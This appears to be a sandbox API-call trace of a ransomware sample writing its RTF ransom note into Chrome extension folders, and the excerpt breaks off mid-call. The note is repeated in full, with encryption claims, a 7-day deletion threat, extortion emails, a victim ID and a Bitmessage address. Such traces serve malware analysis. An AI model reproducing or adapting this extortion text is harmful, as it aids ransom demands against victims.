lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.117] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.118] CloseHandle (hObject=0x2e8) returned 1 [0292.118] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\#readme_eman#.rtf")) returned 0xffffffff [0292.118] GetLastError () returned 0x2 [0292.118] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.118] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.118] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.118] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 